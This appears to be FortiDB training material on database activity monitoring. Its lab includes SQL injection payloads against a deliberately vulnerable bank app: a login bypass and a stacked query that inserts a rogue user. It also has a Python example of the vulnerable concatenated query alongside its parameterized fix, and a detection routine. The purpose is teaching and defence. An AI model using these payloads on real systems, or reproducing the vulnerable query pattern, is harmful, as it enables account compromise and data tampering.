5. Configure and Start the monitor
6. Generate events
7. See results

Creating Custom DAM Policies (cont.)

Creating Custom DAM Policy Group

Configure Database Monitor in MS SQL Server DB

Create an Alert Group


1. Create a new Alert Group
Name: MS-SQL Alerts
Filter: Database Type = Microsoft SQL Server

2. Go to the Alerts Pane
3. Select the recently created group. You shouldn't see any alert

Generating Events in MS SQL Server


1. Connect with sa to the database using Microsoft SQL Server Management Studio
2. Create a new query and run:
SELECT * FROM dbo.spt_values ;

3. Review and discuss results

Generating Events in MS SQL Server (cont.)

Generating Events in MS SQL Server (cont.)

Have you got any alert? Why?

Generating Events in MS SQL Server (cont.)


1. Create a new SQL Server login: badguy
2. Create a new master database user based on the badguy login
3. Re-connect to SQL Server using badguy

4. Run the query once more


5. Review results

Generating Events in MS SQL Server (cont.)

Generating Events in MS SQL Server (cont.)

SQL Injection

SQL Injection An overview of SQL


Querying the database (basic):
SELECT Field1, Field2, ... FROM Table1, Table2, ... WHERE Condition1 [and|or] Condition2

SELECT customer_fname, customer_lname FROM xbank_customer WHERE customer_id = 1

XBANK_CUSTOMER table columns: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since

SQL Injection An overview of SQL


Inserting a record in a database (basic):
INSERT INTO Table1 ( Field1, Field2, ... ) VALUES ( Value1, Value2, ... )

INSERT INTO xbank_customer ( customer_login, customer_password, customer_fname, customer_lname ) VALUES ( 'mylogin', 'abc1234', 'John', 'Anderson' )

SQL Injection An overview of SQL


Updating a record in a database (basic):
UPDATE Table1 SET Field1 = Value1, Field2 = Value2, ... WHERE Condition1 [and|or] Condition2

UPDATE xbank_customer SET customer_login = 'mylogin', customer_password = 'abc1234', customer_fname = 'John', customer_lname = 'Anderson' WHERE customer_id = 1

SQL Injection A look into verify_admin.php

SQL Injection - CHALLENGE: Login to the application
Try to login to the application without using any valid user or password. TIP: You'll have to inject some SQL

SQL Injection : Login to the application


By injecting some SQL you can change the conditional part of the query so it's always true
Login: whatever you want
Password: mypassword' or 'a'='a

Take a look at the query executed by the application:

select customer_id from xbank_customer where customer_login = 'whatever you want' and customer_password = 'mypassword' or 'a'='a' ;

The part that is after the or is always true: 'a' is always equal to 'a'
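The bypass can be reproduced, and fixed, in a few lines. The following Python/sqlite3 script is an added example and not the lab's verify_admin.php: it builds a minimal xbank_customer table in memory with one constructed customer, runs the lab's login query by concatenating the user input (the vulnerable form the slide shows) and then with bound parameters. With parameters the injected text stays inside the password value, so the condition is never rewritten and the login fails.

```python
import sqlite3

# Added example, not the lab application: the same login query built two ways.


def make_db():
    """Create an in-memory xbank_customer table with one constructed customer."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE xbank_customer ("
        " customer_id INTEGER PRIMARY KEY,"
        " customer_login TEXT, customer_password TEXT,"
        " customer_fname TEXT, customer_lname TEXT)"
    )
    conn.execute(
        "INSERT INTO xbank_customer (customer_login, customer_password, customer_fname, customer_lname)"
        " VALUES ('mylogin', 'abc1234', 'John', 'Anderson')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, login, password):
    """Vulnerable form: user input is pasted into the SQL text, so a quote in the
    password closes the literal and the rest becomes part of the WHERE clause."""
    sql = (
        "select customer_id from xbank_customer where customer_login = '" + login
        + "' and customer_password = '" + password + "' ;"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, login, password):
    """Hardened form: the driver sends the values separately from the statement,
    so the quote and the OR are compared as plain characters of the password."""
    sql = "select customer_id from xbank_customer where customer_login = ? and customer_password = ?"
    row = conn.execute(sql, (login, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "mypassword' or 'a'='a"   # the lab's password field input
    print("vulnerable:", login_vulnerable(db, "whatever you want", payload))      # 1: logged in
    print("parameterized:", login_parameterized(db, "whatever you want", payload))  # None: rejected
```

Storing passwords in clear text, as the lab table does, is a second defect the parameterized query does not address; it is left as the slides have it so the query matches the lab.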

SQL Injection Creating a new user
Besides modifying the condition, we can take advantage of the ; to actually create a new user in the database.
Before showing how to create a new user by injecting code, let's configure FortiDB to alert when the application launches an INSERT. The XBANK application should NEVER execute an INSERT or DELETE on the xbank_customer table.

SQL Injection Creating a new user (2)

1. Go to Monitors and edit xbankapp_db

2. Policies

3. Add a new Table policy

SQL Injection Creating a new user (3)

1. Name

2. Select DB 3. Select Schema

4. Select the xbank_customer table, for the write action only

SQL Injection Creating a new user (4)


1. Enable Suspicious Login Name

2. Add user app_user

3. Save

SQL Injection Creating a new user (5)

1. Click Restart to update monitor configuration

SQL Injection Creating a new user (6)


Things can be even worse. You could insert a customer into the database.
Login: whatever you want
Password: a' ; insert into xbank_customer (customer_login, customer_password) values ('imbad','1234') ; select * from xbank_customer where customer_login = 'a

Take a look at the query executed by the application:

select customer_id from xbank_customer where customer_login = 'whatever you want' and customer_password = 'a' ; insert into xbank_customer (customer_login, customer_password) values ('imbad','1234') ; select * from xbank_customer where customer_login = 'a' ;

Login to the application using imbad as login name and 1234 as password. Voilà!

SQL Injection Creating a new user (7)

1. Go to Alerts and review if an alert was generated
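The two table policies configured in this module, the dbo.spt_values policy (alert when anyone other than dbo reads or writes it) and the xbank_customer policy (alert when the suspicious login app_user writes to it), can be modelled as a small detection routine. The following Python script is an added example and not FortiDB's monitor: the policy structure, the statement classifier and the audit events are all constructed for the example, and the classifier only recognises the verbs and the FROM/INTO/UPDATE/JOIN clauses needed for the lab statements, whereas the appliance parses full SQL. It replays the lab queries, including the stacked injection query from the previous slides, and reports which ones raise an alert.

```python
import re

# Added example, not FortiDB code: evaluates constructed table policies against
# constructed audit events that replay the lab steps.

# Policies mirroring the lab configuration (constructed representation).
POLICIES = [
    {"name": "spt_values_access", "table": "spt_values", "actions": {"read", "write"},
     "users": None, "exclude_users": {"dbo"}},          # anyone but dbo, read or write
    {"name": "xbank_customer_write", "table": "xbank_customer", "actions": {"write"},
     "users": {"app_user"}, "exclude_users": set()},    # suspicious login app_user, write only
]

WRITE_VERBS = {"insert", "update", "delete"}


def split_statements(sql):
    """Split on ';' outside single-quoted strings, so stacked queries are judged one by one."""
    parts, current, in_string = [], [], False
    for ch in sql:
        if ch == "'":
            in_string = not in_string
        if ch == ";" and not in_string:
            parts.append("".join(current))
            current = []
        else:
            current.append(ch)
    parts.append("".join(current))
    return [p.strip() for p in parts if p.strip()]


def classify(statement):
    """Return (action, set of table names) for one statement.
    Deliberately small: first verb decides read/write, and table names are taken
    from FROM / INTO / UPDATE / JOIN clauses only."""
    verb = statement.split(None, 1)[0].lower()
    action = "write" if verb in WRITE_VERBS else "read"
    stripped = re.sub(r"'[^']*'", "''", statement)  # ignore table-like words inside string literals
    tables = set()
    for match in re.finditer(r"\b(?:from|into|update|join)\s+([A-Za-z_][\w.]*)", stripped, re.IGNORECASE):
        tables.add(match.group(1).split(".")[-1].lower())  # drop the dbo. schema prefix
    return action, tables


def evaluate(events, policies=POLICIES):
    """Return (policy name, user, statement) for every statement that violates a policy."""
    alerts = []
    for event in events:
        for stmt in split_statements(event["sql"]):
            action, tables = classify(stmt)
            for policy in policies:
                if policy["table"] not in tables or action not in policy["actions"]:
                    continue
                user = event["user"]
                if user in policy["exclude_users"]:
                    continue
                if policy["users"] is not None and user not in policy["users"]:
                    continue
                alerts.append((policy["name"], user, stmt))
    return alerts


# Constructed audit events replaying the lab.
EVENTS = [
    {"user": "dbo", "sql": "SELECT * FROM dbo.spt_values ;"},       # sa as dbo: no alert
    {"user": "badguy", "sql": "SELECT * FROM dbo.spt_values ;"},    # badguy: alert
    {"user": "app_user",                                            # normal login query: read only
     "sql": "select customer_id from xbank_customer where customer_login = 'x' and customer_password = 'y' ;"},
    {"user": "app_user",                                            # injected stacked query: INSERT alerts
     "sql": "select customer_id from xbank_customer where customer_login = 'whatever you want' and "
            "customer_password = 'a' ; insert into xbank_customer (customer_login, customer_password) "
            "values ('imbad','1234') ; select * from xbank_customer where customer_login = 'a' ;"},
]

if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(alert)
```

The second event alerts because badguy is not dbo; the third does not, because the application is allowed to read xbank_customer; the fourth alerts on its middle statement alone, which is the write the lab's policy was created to catch.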

FortiDB Basic Troubleshooting

FortiDB System Dashboard

DB Activity Monitoring Details

DB Activity Monitoring Log

Local Audit Trail

Enable it at: Administration > Global Configuration

FortiDB Licence Information

Testing Database Connections

If something goes wrong, you will see details of the connection problem

Monitoring Check

Monitoring Management Status Icon

Monitoring Management Start / Stop Monitoring

System Resources
FortiDB Appliances have a System Resources option in the GUI.
The System Resources section displays usage of the FortiDB unit's resources, including CPU, memory (RAM) and hard disk.
CPU Usage: The current status of CPU usage. This field displays CPU usage for core processes only. CPU usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded.
Memory Usage: The current status of memory usage. This field displays memory usage for core processes only. Memory usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded.
Hard Disk Usage: The current status of hard disk usage. This field displays the amount of hard disk space used.

Execute Ping
The execute ping command allows you to send an ICMP echo request (ping) to test the network connection between the FortiDB system and another network device.
Syntax: execute ping {<ip> | <hostname>}

Sample command : execute ping 192.168.1.23

Execute Traceroute
The execute traceroute command allows you to test the connection between the FortiDB system and another network device, and display information about the network hops between the device and the FortiDB system.
Syntax: execute traceroute {<address_ipv4> | <host-name>}

Sample command : execute traceroute <your_IPaddress>

Config System Interface


Works in the same way as on FortiGate. The config system interface command allows you to edit the configuration of a FortiDB network interface.
Sample command:
config system interface
    edit port1
        set allowaccess ping https ssh
        set ip 192.168.100.159 255.255.255.0
        set status up
end

Config System Route


The config system route command allows you to view or configure static routing table entries.
Syntax:
config system route
    edit <seq_num>
        set device <port>
        set dst <dst_ip_mask>
        set gateway <gw_ip>
end

FortiDB Advanced Troubleshooting

Backing Up your Configuration


You will need an FTP server to back up the current configuration from the CLI. Log into the CLI. Enter the following command to back up your local database, system configuration settings, archives and reports:
execute backup all-settings <ftp server> <filepath> <username> <password> [cryptpasswd]

Restoring your Configuration


Log into the CLI.

Enter the following command to copy the backup configuration settings to restore the file on the FortiDB unit:
execute restore all-settings <ftp server> <filepath> <username> <password> [cryptpasswd]

Note: This operation will replace your current settings and necessitate a reboot.

Execute backup-remove fd-archive


This FortiDB CLI command allows you to back up and then remove your archives.
Syntax: execute backup-remove fd-archive <before-date> <ftp server> <username> <password> [directory] [filename]

where:
<before-date> Date of the last archive you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)). YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of the FTP server.
<username> User name of the account that logs on to the FTP server.
<password> Password of the account that logs on to the FTP server.
[directory] Location on the FTP server where you want the tar file to be placed.
[filename] Name for the tar file on the FTP server where you want the archives to be placed. The default file name is FD-ARCHIVE-<before-date>.tar.

Sample command: execute backup-remove fd-archive 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myArchives.tar

Execute backup-remove fd-report


This FortiDB CLI command allows you to back up and then remove your reports.
Syntax: execute backup-remove fd-report <before-date> <ftp server> <username> <password> [directory] [filename]

where:
<before-date> Date of the reports you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)). YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of the FTP server.
<username> User name of the account that logs on to the FTP server.
<password> Password of the account that logs on to the FTP server.
[directory] Location on the FTP server where you want the tar file to be placed.
[filename] Name for the tar file on the FTP server where you want the reports to be placed. The default file name is FD-REPORT-<before-date>.tar.

Sample command: execute backup-remove fd-report 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myReports.tar

Diagnose Command
Diagnose commands display diagnostic information that helps you troubleshoot problems.

diagnose system export
This FortiDB CLI command allows you to export diagnostic information to an FTP server.
Syntax: diagnose system export fd_log <ftp server> <user> <password> [directory] [filename]

where:
<ftp server> IP address or hostname of the FTP server
<username> User name of the account that logs on to the FTP server
<password> Password of the account that logs on to the FTP server
[directory] Location on the FTP server where you want the diagnostic file to be placed
[filename] Name of the zip file that contains several log files that will be put on the FTP server. If you don't specify a filename, you will get a default file called fortidb.zip.

Sample command: diagnose system export fd_log <your_ftp_server> <your_ftp_username> <your_ftp_password> . myDiagnose.zip

Execute Top

The execute top command allows you to view the processes running on the FortiDB system.
Syntax: execute top

To exit the display, type q. Other interactive commands are available while running top. For help on them, type h.

Execute Restart
This FortiDB CLI command allows you to shut down and restart the application server under which FortiDB is running.
Syntax: execute restart appserver

Execute Reboot
The execute reboot command allows you to restart the FortiDB system. This command will disconnect all sessions on the FortiDB system.
Syntax: execute reboot

Execute Reset
The execute reset command allows you to reset the FortiDB system to factory defaults. This command will disconnect all sessions and restart the FortiDB system.
Syntax: execute reset {admin-password | all-settings | data}
where:
admin-password: Reset the admin password to the default password.
all-settings: Reset all settings.
data: Reset the database.

Sample command: execute reset all-settings

Execute Format Disk


The execute format disk command allows you to format the hard disk on the FortiDB system. Executing this command will erase all device settings/images, VPN & Update Manager databases, and log data on the FortiDB system's hard drive. FortiDB's IP address and routing information will be preserved.
Syntax: execute format disk

Warning: If you use this command without executing the backup all-settings command, you may not be able to view assessments or reports after you archive and restore your data. When you want to archive and format the disk, make sure that you execute the config system backup allsettings command before archiving.

Questions
Thank you
